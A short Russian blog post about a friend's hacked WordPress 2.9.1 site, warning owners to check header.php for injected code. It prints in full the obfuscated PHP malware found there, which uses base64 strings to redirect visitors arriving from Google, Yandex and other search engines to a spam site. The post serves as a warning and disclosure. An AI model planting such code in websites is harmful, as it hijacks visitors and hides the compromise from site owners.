Заломали
Сегодня у Костика на сайте обнаружили в файле header.php код вируса, он перенаправлял посетителей, которые пытались перейти на этот сайт из Google на на другие левые сайты типа этого “http://magik-tunes.com/?&wmid=112″. Самое интересное, что если просто в адресной строке набрать адрес его сайта, то все нормально, но если пришли с поисковика, то перекинет на один из этих сайтов.
Вот код вируса:
<? function _879214760($i){$a=Array('SFRUUF9SRUZFUkVS','aHR0cDovL3J1em9uZXh4eC5jb20vP3VpZD1jN2FjOTA0MDhmZWNlYWNkZDg5MjBkOGZlMmUzNGE0NA==','Z29vZ2xlLnJ1','eWEucnU=','eWFuZGV4LnJ1','bWFpbC5ydQ==','cmFtYmxlcg==','TG9jYXRpb246IA==');return base64_decode($a[$i]);} ?><?php __0($_SERVER[_879214760(0)],_879214760(1));function __0($_0,$_1){if($_0!=false){$_2=array(_879214760(2),_879214760(3),_879214760(4),_879214760(5),_879214760(6));foreach($_2 as $_3){if(strstr($_0,$_3)){header(_879214760(7) .$_1);die();}}}} ?>
Так что рекомендую всем кто держит сайты проверить файлик header.php на наличие в самом начале подобного текста и если он там, то удалить его. Главный вопрос, который меня мучает – это как им падлам удалось его туда запихнуть? Я понимаю, если бы он не обновлял движок и сидел бы на доисторической версии, но у него установлена самая на сегодня последняя версия WordPress 2.9.1.
